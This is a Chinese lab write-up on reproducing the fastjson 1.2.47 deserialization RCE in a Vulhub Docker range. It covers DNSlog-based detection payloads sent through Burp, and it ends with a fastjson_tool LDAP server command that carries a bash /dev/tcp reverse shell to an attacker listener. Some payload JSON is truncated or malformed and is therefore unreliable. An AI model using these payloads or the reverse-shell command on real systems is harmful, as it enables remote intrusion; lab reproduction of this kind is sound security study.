Vulhub复现fastjson漏洞

漏洞"/>

Vulhub复现fastjson漏洞

目录

• fastjson介绍
• vulhub靶场安装
• vulhub靶场启动fastjson场景
• 用dnslog来测试是否有漏洞

fastjson介绍

Fastjson 是一个 Java 库，可以将 Java 对象转换为 JSON 格式，当然它也可以将 JSON 字符串转换为Java对象，Fastjson 可以操作任何 Java 对象，即使是一些预先存在的没有源码的对象。

vulhub靶场安装

下载vulhub离线包，docker-compose启动

• (1) systemctl start docker 启动docker服务
• (2) 下载vulhub靶场
• vulhub项目地址
• wget .zip -O vulhub-master.zip 下载vulhub
• (3) 搭建fastjson漏洞环境
• unzip vulhub-master.zip 解压vulhub-master.zip
• cd vulhub-master/fastjson/1.2.47-rce/ 进入vulhub-master目录下
• docker-compose up -d 使用docker-compose拉取启动fastjson靶场
  

vulhub靶场启动fastjson场景

• 访问地址：192.168.8.154:8090
  

用dnslog来测试是否有漏洞

（1）dnslog原理

DNSlog就是储存在DNS上的域名相关的信息,它记录着你对域名或者IP的访问信息,也就是类似于日志文件。

首先了解一下多级域名的概念，我们知道因特网采用树状结构命名方法，按组织结构划分域是一个名字空间中一个被管理的划分，域可划分为子域，子域再可被划分为多级域名称为一级域名，二级域名，三级域名，从一个域名地址来从右到左依次是顶级域名，二级域名，三级域名,例如 gaobai.kxsy,通俗的说就是我有个域名kxsy.work，我将域名设置对应的ip 2.2.2.2上，这样当我向dns服务器发起kxsy.work的解析请求时，DNSlog中会记录下他给kxsy.work解析，解析值为2.2.2.2，而我们这个解析的记录的值就是我们要利用的地方,这个过程被记录下来就是DNSlog。

（2）在线的dnslog平台

（3）利用dnslog测试是否有漏洞

• {"a":{"@type":"java.Inet6Address","val":"dnslog"}}

• {"a":{"@type":"java.InetSocketAddress"{"address":,"val":"dnslog"}}}

• {"a":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.URL","val":"dnslog"}}""}}

• {"a":{"@type":"java.URL","val":"dnslog"}}

• 访问网址192.168.8.154:8090，使用BP进行抓包改包
  

• {"a":{"@type":"java.Inet6Address","val":"24zala.dnslog"}}
  

• dnslog得到回显，说明存在漏洞
  

• java -cp fastjson_tool.jar fastjson.HLDAPServer 192.168.8.155 8888 "bash=/bin/bash -i >& /dev/tcp/192.168.8.155/7777 0>&1"
  

• 利用生成的payload进行攻击
  

• 监听界面出现如下提示表明获得反弹shell